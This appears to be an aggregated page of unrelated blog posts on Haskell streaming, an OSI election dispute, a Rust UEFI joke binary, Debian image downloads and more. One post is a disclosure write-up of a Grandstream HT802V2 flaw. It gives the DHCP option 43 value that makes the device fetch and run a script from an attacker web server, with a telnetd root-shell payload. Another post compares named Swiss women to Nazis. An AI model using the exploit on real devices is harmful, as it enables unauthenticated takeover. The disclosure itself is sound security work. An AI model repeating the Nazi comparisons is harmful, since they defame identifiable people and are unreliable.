Streamly offers an interface to permit composing concurrent (note: not distributed) programs via combinators. It relies upon fusing a streaming pipeline to remove intermediate list structure allocations and de-allocations (i.e. de-forestation, similar to GHC rewrite rules)
The examples I've seen use standard combinators (e.g. Control.Function.&
,
which reads left-to-right, and Applicative
).
Streamly provide benchmarks versus Haskell pure lists, Streaming, Pipes and Conduit: these generally show Streamly several orders of magnitude faster.
I'm finding it hard to evaluate Streamly. It's big, and it's focus is wide. It provides shadows of Prelude functions, as many of these libraries do.
It seems almost like it must be a rite-of-passage to write a streaming system in Haskell. Stones and glass houses, I'm guilty of that too.
The focus of the surveyed libraries is mostly on providing a streaming abstraction, normally with an analogous interface to standard Haskell lists. They differ on various philosophical points (whether to abstract away the mechanics behind type synonyms, how much to leverage existing Haskell idioms, etc). A few of the libraries have some rudimentary support for distributed operation, but this is limited to connecting separate nodes together: in some cases serialising data remains the application programmer's job, and in all cases the application programmer must manually carve up their processing according to a fixed idea of what nodes they are deploying to. They all define a fixed-function pipeline.
The Open Source Initiative has two classes of board seats: Affiliate seats, and Individual Member seats.
In the upcoming election, each affiliate can nominate a candidate, and each affiliate can cast a vote for the Affiliate candidates, but there's only 1 Affiliate seat available. I initially expressed interest in being nominated as an Affiliate candidate via Debian. But since Bradley Kuhn is also running for an Affiliate seat with a similar platform to me, especially with regards to the OSAID, I decided to run as part of an aligned "ticket" as an Individual Member to avoid contention for the 1 Affiliate seat.
Bradley and I discussed running on a similar ticket around 8/9pm Pacific, and I submitted my candidacy around 9pm PT on 17 February.
I was dismayed when I received the following mail from Nick Vidal:
Dear Luke,
Thank you for your interest in the OSI Board of Directors election. Unfortunately, we are unable to accept your application as it was submitted after the official deadline of Monday Feb 17 at 11:59 pm UTC. To ensure a fair process, we must adhere to the deadline for all candidates.
We appreciate your enthusiasm and encourage you to stay engaged with OSI’s mission. We hope you’ll consider applying in the future or contributing in other meaningful ways.
Best regards,
OSI Election Teams
Nowhere on the "OSI’s board of directors in 2025: details about the elections" page do they list a timezone for closure of nominations; they simply list Monday 17 February.
The OSI's contact address is in California, so it seems arbitrary and capricious to retroactively define all of these processes as being governed by UTC.
I was not able to participate in the "potential board director" info sessions accordingly, but people who attended heard that the importance of accommodating differing TZ's was discussed during the info session, and that OSI representatives mentioned they try to accommodate TZ's of everyone. This seems in sharp contrast with the above policy.
I urge the OSI to reconsider this policy and allow me to stand for an Individual seat in the current cycle.
21 February, 2025 10:35AM by Luke Faraone (noreply@blogger.com)
Oliver Lindburg wrote an interesting article about Designing for Crisis [1].
Anarcat has an interesting review of qalc which is a really good calculator, I’ll install it on all my workstations [3]. It even does furlongs per fortnight! This would be good to be called from a LLM system when someone asks about mathematical things.
Krebs has an informative article about a criminal employed by Elon’s DOGE [4]. Conservatives tend to be criminals.
Krebs wrote an interesting article about the security of the iOS (and presumably Android) apps for DeekSeek [5]. Seems that the DeepSeek people did everything wrong.
Bruce Schneier and Davi Ottenheimer wrote an insightful article DOGE as a National Cyberattack [6].
This youtube video about designing a compressed air engine for a model plane is interesting [9].
ArsTechnica has an informative article about device code phishing [12]. The increased use of single-sign-on is going to make this more of a problem.
Shrivu wrote an insightful and informative article on how to backdoor LLMs [13].
21 February, 2025 08:00AM by etbe
I can’t remember exactly the joke I was making at the time in my work’s slack instance (I’m sure it wasn’t particularly funny, though; and not even worth re-reading the thread to work out), but it wound up with me writing a UEFI binary for the punchline. Not to spoil the ending but it worked - no pesky kernel, no messing around with “userland”. I guess the only part of this you really need to know for the setup here is that it was a Severance joke, which is some fantastic TV. If you haven’t seen it, this post will seem perhaps weirder than it actually is. I promise I haven’t joined any new cults. For those who have seen it, the payoff to my joke is that I wanted my machine to boot directly to an image of Kier Eagan.
As for how to do it – I figured I’d give the uefi crate a shot, and see how it is to use, since this is a low stakes way of trying it out. In general, this isn’t the sort of thing I’d usually post about – except this wound up being easier and way cleaner than I thought it would be. That alone is worth sharing, in the hopes someome comes across this in the future and feels like they, too, can write something fun targeting the UEFI.
First thing’s first – gotta create a rust project (I’ll leave that part to you
depending on your life choices), and to add the uefi
crate to your
Cargo.toml
. You can either use cargo add
or add a line like this by hand:
uefi = { version = "0.33", features = ["panic_handler", "alloc", "global_allocator"] }
We also need to teach cargo about how to go about building for the UEFI target,
so we need to create a rust-toolchain.toml
with one (or both) of the UEFI
targets we’re interested in:
[toolchain]
targets = ["aarch64-unknown-uefi", "x86_64-unknown-uefi"]
Unfortunately, I wasn’t able to use the
image crate,
since it won’t build against the uefi
target. This looks like it’s
because rustc had no way to compile the required floating point operations
within the image
crate without hardware floating point instructions
specifically. Rust tends to punt a lot of that to libm
usually, so this isnt
entirely shocking given we’re nostd
for a non-hardfloat target.
So-called “softening” requires a software floating point implementation that
the compiler can use to “polyfill” (feels weird to use the term polyfill here,
but I guess it’s spiritually right?) the lack of hardware floating point
operations, which rust hasn’t implemented for this target yet. As a result, I
changed tactics, and figured I’d use ImageMagick
to pre-compute the pixels
from a jpg
, rather than doing it at runtime. A bit of a bummer, since I need
to do more out of band pre-processing and hardcoding, and updating the image
kinda sucks as a result – but it’s entirely manageable.
$ convert -resize 1280x900 kier.jpg kier.full.jpg
$ convert -depth 8 kier.full.jpg rgba:kier.bin
This will take our input file (kier.jpg
), resize it to get as close to the
desired resolution as possible while maintaining aspect ration, then convert it
from a jpg
to a flat array of 4 byte RGBA
pixels. Critically, it’s also
important to remember that the size of the kier.full.jpg
file may not actually
be the requested size – it will not change the aspect ratio, so be sure to
make a careful note of the resulting size of the kier.full.jpg
file.
Last step with the image is to compile it into our Rust bianary, since we don’t want to struggle with trying to read this off disk, which is thankfully real easy to do.
const KIER: &[u8] = include_bytes!("../kier.bin");
const KIER_WIDTH: usize = 1280;
const KIER_HEIGHT: usize = 641;
const KIER_PIXEL_SIZE: usize = 4;
Remember to use the width and height from the final kier.full.jpg
file as the
values for KIER_WIDTH
and KIER_HEIGHT
. KIER_PIXEL_SIZE
is 4, since we
have 4 byte wide values for each pixel as a result of our conversion step into
RGBA. We’ll only use RGB, and if we ever drop the alpha channel, we can drop
that down to 3. I don’t entirely know why I kept alpha around, but I figured it
was fine. My kier.full.jpg
image winds up shorter than the requested height
(which is also qemu’s default resolution for me) – which means we’ll get a
semi-annoying black band under the image when we go to run it – but it’ll
work.
Anyway, now that we have our image as bytes, we can get down to work, and write the rest of the code to handle moving bytes around from in-memory as a flat block if pixels, and request that they be displayed using the UEFI GOP. We’ll just need to hack up a container for the image pixels and teach it how to blit to the display.
/// RGB Image to move around. This isn't the same as an
/// `image::RgbImage`, but we can associate the size of
/// the image along with the flat buffer of pixels.
struct RgbImage {
/// Size of the image as a tuple, as the
/// (width, height)
size: (usize, usize),
/// raw pixels we'll send to the display.
inner: Vec<BltPixel>,
}
impl RgbImage {
/// Create a new `RgbImage`.
fn new(width: usize, height: usize) -> Self {
RgbImage {
size: (width, height),
inner: vec![BltPixel::new(0, 0, 0); width * height],
}
}
/// Take our pixels and request that the UEFI GOP
/// display them for us.
fn write(&self, gop: &mut GraphicsOutput) -> Result {
gop.blt(BltOp::BufferToVideo {
buffer: &self.inner,
src: BltRegion::Full,
dest: (0, 0),
dims: self.size,
})
}
}
impl Index<(usize, usize)> for RgbImage {
type Output = BltPixel;
fn index(&self, idx: (usize, usize)) -> &BltPixel {
let (x, y) = idx;
&self.inner[y * self.size.0 + x]
}
}
impl IndexMut<(usize, usize)> for RgbImage {
fn index_mut(&mut self, idx: (usize, usize)) -> &mut BltPixel {
let (x, y) = idx;
&mut self.inner[y * self.size.0 + x]
}
}
We also need to do some basic setup to get a handle to the UEFI
GOP via the UEFI crate (using
uefi::boot::get_handle_for_protocol
and
uefi::boot::open_protocol_exclusive
for the GraphicsOutput
protocol), so that we have the object we need to pass to RgbImage
in order
for it to write the pixels to the display. The only trick here is that the
display on the booted system can really be any resolution – so we need to do
some capping to ensure that we don’t write more pixels than the display can
handle. Writing fewer than the display’s maximum seems fine, though.
fn praise() -> Result {
let gop_handle = boot::get_handle_for_protocol::<GraphicsOutput>()?;
let mut gop = boot::open_protocol_exclusive::<GraphicsOutput>(gop_handle)?;
// Get the (width, height) that is the minimum of
// our image and the display we're using.
let (width, height) = gop.current_mode_info().resolution();
let (width, height) = (width.min(KIER_WIDTH), height.min(KIER_HEIGHT));
let mut buffer = RgbImage::new(width, height);
for y in 0..height {
for x in 0..width {
let idx_r = ((y * KIER_WIDTH) + x) * KIER_PIXEL_SIZE;
let pixel = &mut buffer[(x, y)];
pixel.red = KIER[idx_r];
pixel.green = KIER[idx_r + 1];
pixel.blue = KIER[idx_r + 2];
}
}
buffer.write(&mut gop)?;
Ok(())
}
Not so bad! A bit tedious – we could solve some of this by turning
KIER
into an RgbImage
at compile-time using some clever Cow
and
const
tricks and implement blitting a sub-image of the image – but this
will do for now. This is a joke, after all, let’s not go nuts. All that’s
left with our code is for us to write our main
function and try and boot
the thing!
#[entry]
fn main() -> Status {
uefi::helpers::init().unwrap();
praise().unwrap();
boot::stall(100_000_000);
Status::SUCCESS
}
If you’re following along at home and so interested, the final source is over at
gist.github.com.
We can go ahead and build it using cargo
(as is our tradition) by targeting
the UEFI platform.
$ cargo build --release --target x86_64-unknown-uefi
While I can definitely get my machine to boot these blobs to test, I figured
I’d save myself some time by using QEMU to test without a full boot.
If you’ve not done this sort of thing before, we’ll need two packages,
qemu
and ovmf
. It’s a bit different than most invocations of qemu you
may see out there – so I figured it’d be worth writing this down, too.
$ doas apt install qemu-system-x86 ovmf
qemu
has a nice feature where it’ll create us an EFI partition as a drive and
attach it to the VM off a local directory – so let’s construct an EFI
partition file structure, and drop our binary into the conventional location.
If you haven’t done this before, and are only interested in running this in a
VM, don’t worry too much about it, a lot of it is convention and this layout
should work for you.
$ mkdir -p esp/efi/boot
$ cp target/x86_64-unknown-uefi/release/*.efi \
esp/efi/boot/bootx64.efi
With all this in place, we can kick off qemu
, booting it in UEFI mode using
the ovmf
firmware, attaching our EFI partition directory as a drive to
our VM to boot off of.
$ qemu-system-x86_64 \
-enable-kvm \
-m 2048 \
-smbios type=0,uefi=on \
-bios /usr/share/ovmf/OVMF.fd \
-drive format=raw,file=fat:rw:esp
If all goes well, soon you’ll be met with the all knowing gaze of
Chosen One, Kier Eagan. The thing that really impressed me about all
this is this program worked first try – it all went so boringly
normal. Truly, kudos to the uefi
crate maintainers, it’s incredibly
well done.
Sure, we could stop here, but anyone can open up an app window and see a picture of Kier Eagan, so I knew I needed to finish the job and boot a real machine up with this. In order to do that, we need to format a USB stick. BE SURE /dev/sda IS CORRECT IF YOU’RE COPY AND PASTING. All my drives are NVMe, so BE CAREFUL – if you use SATA, it may very well be your hard drive! Please do not destroy your computer over this.
$ doas fdisk /dev/sda
Welcome to fdisk (util-linux 2.40.4).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.
Command (m for help): n
Partition type
p primary (0 primary, 0 extended, 4 free)
e extended (container for logical partitions)
Select (default p): p
Partition number (1-4, default 1):
First sector (2048-4014079, default 2048):
Last sector, +/-sectors or +/-size{K,M,G,T,P} (2048-4014079, default 4014079):
Created a new partition 1 of type 'Linux' and of size 1.9 GiB.
Command (m for help): t
Selected partition 1
Hex code or alias (type L to list all): ef
Changed type of partition 'Linux' to 'EFI (FAT-12/16/32)'.
Command (m for help): w
The partition table has been altered.
Calling ioctl() to re-read partition table.
Syncing disks.
Once that looks good (depending on your flavor of udev
you may or
may not need to unplug and replug your USB stick), we can go ahead
and format our new EFI partition (BE CAREFUL THAT /dev/sda IS YOUR
USB STICK) and write our EFI directory to it.
$ doas mkfs.fat /dev/sda1
$ doas mount /dev/sda1 /mnt
$ cp -r esp/efi /mnt
$ find /mnt
/mnt
/mnt/efi
/mnt/efi/boot
/mnt/efi/boot/bootx64.efi
Of course, naturally, devotion to Kier shouldn’t mean backdooring your system.
Disabling Secure Boot runs counter to the Core Principals, such as Probity, and
not doing this would surely run counter to Verve, Wit and Vision. This bit does
require that you’ve taken the step to enroll a
MOK and know how
to use it, right about now is when we can use sbsign
to sign our UEFI binary
we want to boot from to continue enforcing Secure Boot. The details for how
this command should be run specifically is likely something you’ll need to work
out depending on how you’ve decided to manage your MOK.
$ doas sbsign \
--cert /path/to/mok.crt \
--key /path/to/mok.key \
target/x86_64-unknown-uefi/release/*.efi \
--output esp/efi/boot/bootx64.efi
I figured I’d leave a signed copy of boot2kier
at
/boot/efi/EFI/BOOT/KIER.efi
on my Dell XPS 13, with Secure Boot enabled
and enforcing, just took a matter of going into my BIOS to add the right
boot option, which was no sweat. I’m sure there is a way to do it using
efibootmgr
, but I wasn’t smart enough to do that quickly. I let ‘er rip,
and it booted up and worked great!
It was a bit hard to get a video of my laptop, though – but lucky for me, I have a Minisforum Z83-F sitting around (which, until a few weeks ago was running the annual http server to control my christmas tree ) – so I grabbed it out of the christmas bin, wired it up to a video capture card I have sitting around, and figured I’d grab a video of me booting a physical device off the boot2kier USB stick.
Attentive readers will notice the image of Kier is smaller then the qemu booted system – which just means our real machine has a larger GOP display resolution than qemu, which makes sense! We could write some fancy resize code (sounds annoying), center the image (can’t be assed but should be the easy way out here) or resize the original image (pretty hardware specific workaround). Additionally, you can make out the image being written to the display before us (the Minisforum logo) behind Kier, which is really cool stuff. If we were real fancy we could write blank pixels to the display before blitting Kier, but, again, I don’t think I care to do that much work.
If I wanted to keep this joke going, I’d likely try and find a copy of the original video when Helly 100%s her file and boot into that – or maybe play a terrible midi PC speaker rendition of Kier, Chosen One, Kier after rendering the image. I, unfortunately, don’t have any friends involved with production (yet?), so I reckon all that’s out for now. I’ll likely stop playing with this – the joke was done and I’m only writing this post because of how great everything was along the way.
All in all, this reminds me so much of building a homebrew kernel to boot a
system into – but like, good, though, and it’s a nice reminder of both how
fun this stuff can be, and how far we’ve come. UEFI protocols are light-years
better than how we did it in the dark ages, and the tooling for this is SO
much more mature. Booting a custom UEFI binary is miles ahead of trying to
boot your own kernel, and I can’t believe how good the uefi
crate is
specifically.
Praise Kier! Kudos, to everyone involved in making this so delightful ❤️.
The Grandstream HT802V2 uses busybox' udhcpc
for DHCP.
When a DHCP event occurs, udhcpc
calls a script (/usr/share/udhcpc/default.script
by default) to further process the received data.
On the HT802V2 this is used to (among others) parse the data in DHCP option 43 (vendor) using the Grandstream-specific parser /sbin/parse_vendor
.
… [ -n "$vendor" ] && { VENDOR_TEST_SERVER="`echo $vendor | parse_vendor | grep gs_test_server | cut -d' ' -f2`" if [ -n "$VENDOR_TEST_SERVER" ]; then /app/bin/vendor_test_suite.sh $VENDOR_TEST_SERVER fi …
According to the documentation the format is <option_code><value_length><value>
.
The only documented option code is 0x01
for the ACS URL.
However, if you pass other codes, these are accepted and parsed too.
Especially, if you pass 0x05
you get gs_test_server
, which is passed in a call to /app/bin/vendor_test_suite.sh
.
What's /app/bin/vendor_test_suite.sh
? It's this nice script:
#!/bin/sh TEST_SCRIPT=vendor_test.sh TEST_SERVER=$1 TEST_SERVER_PORT=8080 cd /tmp wget -q -t 2 -T 5 http://${TEST_SERVER}:${TEST_SERVER_PORT}/${TEST_SCRIPT} if [ "$?" = "0" ]; then echo "Finished downloading ${TEST_SCRIPT} from http://${TEST_SERVER}:${TEST_SERVER_PORT}" chmod +x ${TEST_SCRIPT} corefile_dec ${TEST_SCRIPT} if [ "`head -n 1 ${TEST_SCRIPT}`" = "#!/bin/sh" ]; then echo "Starting GS Test Suite..." ./${TEST_SCRIPT} http://${TEST_SERVER}:${TEST_SERVER_PORT} fi fi
It uses the passed value to construct the URL http://<gs_test_server>:8080/vendor_test.sh
and download it using wget
.
We probably can construct a gs_test_server
value in a way that wget
overwrites some system file, like it was suggested in CVE-2021-37915.
But we also can just let the script download the file and execute it for us.
The only hurdle is that the downloaded file gets decrypted using corefile_dec
and the result needs to have #!/bin/sh
as the first line to be executed.
I have no idea how the encryption works.
But luckily we already have a shell using the OpenVPN exploit and can use /bin/encfile
to encrypt things!
The result gets correctly decrypted by corefile_dec
back to the needed payload.
That means we can take a simple payload like:
#!/bin/sh # you need exactly that shebang, yes telnetd -l /bin/sh -p 1270 &
Encrypt it using encfile
and place it on a webserver as vendor_test.sh
.
The test machine has the IP 192.168.42.222
and python3 -m http.server 8080
runs the webserver on the right port.
This means the value of DHCP option 43 needs to be 05
, 14
(the length of the string being the IP address) and 192.168.42.222
.
In Python:
>>> server = "192.168.42.222" >>> ":".join([f'{y:02x}' for y in [5, len(server)] + [ord(x) for x in server]]) '05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32'
So we set DHCP option 43 to 05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32
and trigger a DHCP run (/etc/init.d/udhcpc restart
if you have a shell, or a plain reboot if you don't).
And boom, root shell on port 1270
:)
As mentioned earlier, this is closely related to CVE-2021-37915, where a binary was downloaded via TFTP from the gdb_debug_server
NVRAM variable or via HTTP from the gs_test_server
NVRAM variable.
Both of these variables were controllable using the existing gs_config
interface after authentication.
But using DHCP for the same thing is much nicer, as it removes the need for authentication completely :)
/usr/share/udhcpc/default.script
and /app/bin/vendor_test_suite.sh
look very similar, according to firmware dumpsAfter disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies /app/bin/vendor_test_suite.sh
to
#!/bin/sh TEST_SCRIPT=vendor_test.sh TEST_SERVER=$1 TEST_SERVER_PORT=8080 VENDOR_SCRIPT="/tmp/run_vendor.sh" cd /tmp wget -q -t 2 -T 5 http://${TEST_SERVER}:${TEST_SERVER_PORT}/${TEST_SCRIPT} if [ "$?" = "0" ]; then echo "Finished downloading ${TEST_SCRIPT} from http://${TEST_SERVER}:${TEST_SERVER_PORT}" chmod +x ${TEST_SCRIPT} prov_image_dec --in ${TEST_SCRIPT} --out ${VENDOR_SCRIPT} if [ "`head -n 1 ${VENDOR_SCRIPT}`" = "#!/bin/sh" ]; then echo "Starting GS Test Suite..." chmod +x ${VENDOR_SCRIPT} ${VENDOR_SCRIPT} http://${TEST_SERVER}:${TEST_SERVER_PORT} fi fi
The crucial part is that now prov_image_dec
is used for the decoding, which actually checks for a signature (like on the firmware image itself), thus preventing loading of malicious scripts.
20 February, 2025 11:38AM by evgeni
It's difficult to find the right Debian image. We have thousands of ISO files and cloud images and we support multiple CPU architectures and several download methods. The directory structure of our main image server is like a maze, and our web pages for downloading are also confusing.
Did you ever searched for a specific Debian image which was not the default netinst ISO for amd64? How long did it take to find it?
Debian is very good at hiding their images for downloading by offering a huge amount of different versions and variants of images and multiple methods how to download them. Debian also has multiple web pages for
This is the secret Debian maze of images. It's currently filled with 8700+ different ISO images and another 34.000+ files (raw and qcow2) for the cloud images.
The main URL for the server hosting all Debian images is https://cdimage.debian.org/cdimage/
There, you will find installer images, live images, cloud images
.
We have three different types of images:
Almost always, you are probably looking for the image to install the latest stable release. The URL https://cdimage.debian.org/cdimage/release/ shows:
12.9.0
12.9.0-live
current
current-live
but you cannot see that two are symlinks:
current -> 12.9.0/
current-live -> 12.9.0-live/
Here you will find the installer images and live images for the stable release (currently Debian 12, bookworm).
If you choose https://cdimage.debian.org/cdimage/release/12.9.0/ you will see a list of CPU architectures:
amd64
arm64
armel
armhf
i386
mips64el
mipsel
ppc64el
s390x
source
trace
(BTW source and trace are no CPU architectures)
The typical end user will not care about most architectures, because your computer will actually always need images from the amd64 folder. Maybe you have heard that your computer has a 64bit CPU and even if you have an Intel processor we call this architecture amd64.
Let's see what's in the folder amd64
:
bt-bd
bt-cd
bt-dvd
iso-bd
iso-cd
iso-dvd
jigdo-16G
jigdo-bd
jigdo-cd
jigdo-dlbd
jigdo-dvd
list-16G
list-bd
list-cd
list-dlbd
list-dvd
Wow. This is confusing and there's no description what all those folders mean.
The first three are different methods how to download an image. Use iso when a single network connection will be fast enough for you. Using bt can result in a faster download, because it downloads via a peer-to-peer file sharing protocol. You need an additional torrent program for downloading.
Then we have these variants:
16G
and dlbd
images are only available via jigdo.
All iso-xx
and bt-xx
folders provide the same images but with a
different access method.
Here are examples of images:
iso-cd/debian-12.9.0-amd64-netinst.iso
iso-cd/debian-edu-12.9.0-amd64-netinst.iso
iso-cd/debian-mac-12.9.0-amd64-netinst.iso
Fortunately the folder explains in very detail the differences between
these images and what you also find there.
You can ignore the SHA...
files if you do not know what they are needed for.
They are not important for you.
These ISO files are small and contain only the core Debian installer
code and a small set of programs. If you install a desktop
environment, the other packages will be downloaded at the end of the installation.
The folders bt-dvd
and iso-dvd
only contain
debian-12.9.0-amd64-DVD-1.iso
or the appropriate torrent file.
In bt-bd
and iso-bd
you will only find debian-edu-12.9.0-amd64-BD-1.iso
.
These large images contain much more Debian packages, so you will not
need a network connection during the installation.
For the other CPU architectures (other than amd64) Debian provides less variants of images but still a lot. In total, we have 44 ISO files (or torrents) for the current release of the Debian installer for all architectures. When using jigdo you can choose between 268 images.
And these are only the installer images for the stable release, no older or newer version are counted here.
The live images in release/12.9.0-live/amd64/iso-hybrid/
are only available for the
amd64 architecture but for newer Debian releases there will be images also
for arm64.
We have 7 different live images containing one of the most common desktop environments and one with only a text interface (standard).
debian-live-12.9.0-amd64-xfce.iso
debian-live-12.9.0-amd64-mate.iso
debian-live-12.9.0-amd64-lxqt.iso
debian-live-12.9.0-amd64-gnome.iso
debian-live-12.9.0-amd64-lxde.iso
debian-live-12.9.0-amd64-standard.iso
debian-live-12.9.0-amd64-cinnamon.iso
debian-live-12.9.0-amd64-kde.iso
The folder name iso-hybrid
is the technology that you can use those ISO files for
burning them onto a CD/DVD/BD or writing the same ISO file to a USB stick.
bt-hybrid
will give you the torrent files for downloading the
same images using a torrent client program.
For newer version of the images we have currently these folders:
daily-builds
weekly-builds
weekly-live-builds
trixie_di_alpha1
I suggest using the weekly-builds
because in this folder you find
a similar structure and all variants of images as in the release
directory. For e.g.
weekly-builds/amd64/iso-cd/debian-testing-amd64-netinst.iso
and similar for the live images
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-kde.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-lxde.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-debian-junior.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-standard.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-lxqt.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-mate.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-xfce.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-gnome.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-cinnamon.iso
weekly-live-builds/arm64/iso-hybrid/debian-live-testing-arm64-gnome.iso
Here you see a new variant call debian-junior
, which is a Debian
blend. BitTorrent files are not available for weekly builds.
The daily-builds
folder structure is different and only provide the small network
install (netinst) ISOs but several versions of the last
days. Currently we have 55 ISO files available there.
If you like to use the newest installation image fetch this one:
Unfortunately Debian does not provide any installation media using the stable release but including a backports kernel for newer hardware. This is because our installer environment is a very complex mix of special tools (like anna) and special .udeb versions of packages.
But the FAIme web service of my FAI project can build a custom installation image using the backports kernel. Choose a desktop environment, a language and add some packages names if you like. Then select Debian 12 bookworm and then enable backports repository including newer kernel. After a short time you can download your own installation image.
Usually you should not use older releases for a new installation. In our archive the folder https://cdimage.debian.org/cdimage/archive/ contains 6163 ISO files starting from Debian 3.0 (first release was in 2002) and including every point release.
The full DVD image for the oldstable release (Debian 11.11.0 including non-free firmware) is here
the smaller netinst image is
https://cdimage.debian.org/cdimage/archive/11.10.0/amd64/iso-cd/debian-11.10.0-amd64-netinst.iso
The oldest ISO I could find is from 1999 using kernel 2.0.36
I still didn't managed to boot it in KVM.
UPDATE I got a kernel panic because the VM had 4GB RAM. Reducing this to 500MB RAM (also 8MB works) started the installer of Debian 2.1 without any problems.
In this post, we still did not cover the ports folder (the non official supported (older) hardware architectures) which contains around 760 ISO files and the unofficial folder (1445 ISO files) which also provided the ISOs which included the non-free firmware blobs in the past.
Then, there are more than 34.000 cloud images. But hey, no ISO files are involved there. This may be part of a complete new posting.
Norvald Ryeng, my old manager, held a talk on the MySQL hypergraph optimizer (which was my main project before I left a couple of years ago) at a pre-FOSDEM event; it's pretty interesting if you want to know the basics of how an SQL join optimizer works.
The talk doesn't go very deep into the specifics of the hypergraph optimizer, but in a sense, that's the point; an optimizer isn't characterized by one unique trick that fixes everything, it's about having a solid foundation and then iterating on that a lot. Perhaps 80% of the talk could just as well have been about any other System R-derived optimizer, and that's really a feature in itself.
I remember that perhaps the most satisfying property during development was when things we hadn't even thought of integrated smoothly; say, when we added support for planning windowing functions and the planner just started pushing down the required sorts (i.e., interesting orders) almost by itself. (This is very unlike the old MySQL optimizer, where pretty much everything needed to think of everything else, or else risk stepping on each others' toes.)
Apart from that, I honestly don't know how far it is from being a reasonable default :-) I guess try it and see, if you're using MySQL?
We're way past the winter solstice, and approaching the equinox. The sun is noticeably staying up later and later every day, which raises an obvious question: when are the days getting longer the fastest? Intuitively I want to say it should happen at the equinox. But does it happen exactly at the equinox? I could read up on all the gory details of this, or I could just make some plots. I wrote this:
#!/usr/bin/python3 import sys import datetime import astral.sun lat = 34. year = 2025 city = astral.LocationInfo(latitude=lat, longitude=0) date0 = datetime.datetime(year, 1, 1) print("# date sunrise sunset length_min") for i in range(365): date = date0 + datetime.timedelta(days=i) s = astral.sun.sun(city.observer, date=date) date_sunrise = s['sunrise'] date_sunset = s['sunset'] date_string = date.strftime('%Y-%m-%d') sunrise_string = date_sunrise.strftime('%H:%M') sunset_string = date_sunset.strftime ('%H:%M') print(f"{date_string} {sunrise_string} {sunset_string} {(date_sunset-date_sunrise).total_seconds()/60}")
This computes the sunrise and sunset time every day of 2025 at a latitude of 34degrees (i.e. Los Angeles), and writes out a log file (using the vnlog format).
Let's plot it:
< sunrise-sunset.vnl \ vnl-filter -p date,l='length_min/60' \ | feedgnuplot \ --set 'format x "%b %d"' \ --domain \ --timefmt '%Y-%m-%d' \ --lines \ --ylabel 'Day length (hours)' \ --hardcopy day-length.svg
Well that makes sense. When are the days the longest/shortest?
$ < sunrise-sunset.vnl vnl-sort -grk length_min | head -n2 | vnl-align # date sunrise sunset length_min 2025-06-21 04:49 19:14 864.8543702000001 $ < sunrise-sunset.vnl vnl-sort -gk length_min | head -n2 | vnl-align # date sunrise sunset length_min 2025-12-21 07:01 16:54 592.8354265166668
Those are the solstices, as expected. Now let's look at the time gained/lost each day:
$ < sunrise-sunset.vnl \ vnl-filter -p date,d='diff(length_min)' \ | vnl-filter --has d \ | feedgnuplot \ --set 'format x "%b %d"' \ --domain \ --timefmt '%Y-%m-%d' \ --lines \ --ylabel 'Daytime gained from the previous day (min)' \ --hardcopy gain.svg
Looks vaguely sinusoidal, like the last plot. And looks like we gain/lost as most ~2 minutes each day. When does the gain peak?
$ < sunrise-sunset.vnl vnl-filter -p date,d='diff(length_min)' | vnl-filter --has d | vnl-sort -grk d | head -n2 | vnl-align # date d 2025-03-19 2.13167 $ < sunrise-sunset.vnl vnl-filter -p date,d='diff(length_min)' | vnl-filter --has d | vnl-sort -gk d | head -n2 | vnl-align # date d 2025-09-25 -2.09886
Not at the equinoxes! The fastest gain is a few days before the equinox and the fastest loss a few days after.
18 February, 2025 06:47PM by Dima Kogan
It is a shocking fact but ten percent of the guards in Nazi concentration camps were women.
Happy Valentine's Day
The Conversation is one of many publishers to write a feature article about these sadistic women.
When we see nazis in the news or in the movies, we typically see pictures of the male leaders and their male soldiers.
In 1957, American engineer Russell Ryan met Braunsteiner while holidaying in Austria. She did not tell him about her past. They fell in love, married and moved to New York, where they lived quiet lives until she was tracked down by Nazi hunter Simon Wiesenthal. Russell could not believe she had been a Nazi concentration camp guard. His wife, he said, “would not hurt a fly”.
The BBC web site has their own article about women torturing Nazi victims.
The fascist regime promoted a world-view of women in traditional mothering roles. Many German women were able to use this philosophy as an opportunity to deny any personal involvement in the Holocaust and most claimed they didn't even know it was happening.
Nonetheless, given that so many women were in fact willing to work in the concentration camps, should we be more skeptical of those German women who claim they knew nothing?
News has recently emerged about young women in Switzerland today openly wearing the swastika tattoo and performing the Nazi salute.
Multiple Swiss women including Caroline Kuhnlein-Hofmann and Melanie Bron in Vaud and Pascale Köster and Albane die Ziegler at Walder Wyss in Zurich signed a document about excluding foreign software developers and obfuscating who really did the work. This is totally analogous to the behavior of the Nazis who plagiarised the work of Jewish authors in textbooks.
Here is another photo from Polymanga 2023 in Montreux, the young Swiss woman is sitting on the edge of Lake Geneva. The lake is the border with France.
I've just passed my 10th anniversary of starting at Red Hat! As a personal milestone, this is the longest I've stayed in a job: I managed 10 years at Newcastle University, although not in one continuous role.
I haven't exactly worked in one continuous role at Red Hat either, but it feels like what I do Today is a logical evolution from what I started doing, whereas in Newcastle I jumped around a bit.
I've seen some changes: in my time here, we changed the logo from Shadow Man; we transitioned to using Google Workspace for lots of stuff, instead of in-house IT; we got bought by IBM; we changed President and CEO, twice. And millions of smaller things.
I won't reach an 11th: my Organisation in Red Hat is moving to IBM. I think this is sad news for Red Hat: they're losing some great people. But I'm optimistic for the future of my Organisation.
Google seems to be more into tracking web users and generally becoming hostile to users [1]. So using a browser other than Chrome seems like a good idea. The problem is the lack of browsers with security support. It seems that the only browser engines with the quality of security support we expect in Debian are Firefox and the Chrome engine. The Chrome engine is used in Chrome, Chromium, and Microsoft Edge. Edge of course isn’t an option and Chromium still has some of the Google anti-features built in.
So I tried to use Firefox for the things I do. One feature of Chrome based browsers that I really like is the ability to set a custom page for the new tab. This feature was removed because it was apparently being constantly attacked by malware [2]. There are addons to allow that but I prefer to have a minimal number of addons and not have any that are just to replace deliberately broken settings in the browser. Also those addons can’t set a file for the URL, so I could set a web server for it but it’s annoying to have to setup a web server to work around a browser limitation.
